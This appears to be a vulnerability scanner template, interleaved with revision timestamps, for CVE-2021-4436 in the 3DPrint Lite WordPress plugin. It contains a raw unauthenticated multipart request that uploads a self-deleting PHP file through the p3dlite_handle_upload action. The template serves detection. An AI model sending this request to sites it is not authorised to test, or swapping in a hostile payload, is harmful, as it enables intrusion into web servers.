2024-06-24 13:55:44 +00:00
id : CVE-2021-4436
info :
name : 3DPrint Lite < 1.9.1.5 - Arbitrary File Upload
author : securityforeveryone
severity : critical
description : |
The plugin does not have any authorisation and does not check the uploaded file in its p3dlite_handle_upload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.
remediation : Fixed in 1.9.1.5
reference :
- https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282/
- https://nvd.nist.gov/vuln/detail/CVE-2021-4436
- https://github.com/fkie-cad/nvd-json-data-feeds
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2021-4436
cwe-id : CWE-434
epss-score : 0.00412
epss-percentile : 0.73863
cpe : cpe:2.3:a:wp3dprinting:3dprint_lite:*:*:*:*:*:wordpress:*:*
metadata :
2024-06-24 17:10:57 +00:00
verified : true
max-request : 1
2024-06-24 13:55:44 +00:00
vendor : wp3dprinting
product : 3dprint_lite
framework : wordpress
2024-06-24 17:10:57 +00:00
publicwww-query : "/wp-content/plugins/3dprint-lite/"
tags : cve,cve2021,3dprint-lite,file-upload,instrusive,wpscan,wordpress,wp-plugin,intrusive
variables :
string : "{{randstr}}"
filename : "{{to_lower(rand_text_alpha(5))}}"
2024-06-24 13:55:44 +00:00
http :
- raw :
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=---------------------------54331109111293931601238262353
-----------------------------54331109111293931601238262353
Content-Disposition : form-data; name="action"
p3dlite_handle_upload
-----------------------------54331109111293931601238262353
2024-06-24 17:10:57 +00:00
Content-Disposition : form-data; name="file"; filename="{{filename}}.php"
2024-06-24 13:55:44 +00:00
Content-Type : text/php
2024-06-24 17:10:57 +00:00
<?php echo "{{string}}";unlink(__FILE__);?>
2024-06-24 13:55:44 +00:00
-----------------------------54331109111293931601238262353 --
matchers-condition : and
matchers :
- type : word
part : body
words :
- '"jsonrpc":"2.0"'
2024-06-24 17:10:57 +00:00
- '"filename":'
- '{{filename}}.php'
2024-06-24 13:55:44 +00:00
condition : and
2024-06-24 14:17:21 +00:00
- type : status
status :
- 200
2024-06-25 07:47:37 +00:00
# digest: 4a0a004730450220505cc213149b2b7ea3611ef5cd0bf0c1d786d34503427cfdbd6ccc0844710e430221008083729a34767882c976fc061ae7a9a6db2061f3de0036ea1c4da8ec263724cf:922c64590222798bb761d5b6d8e72950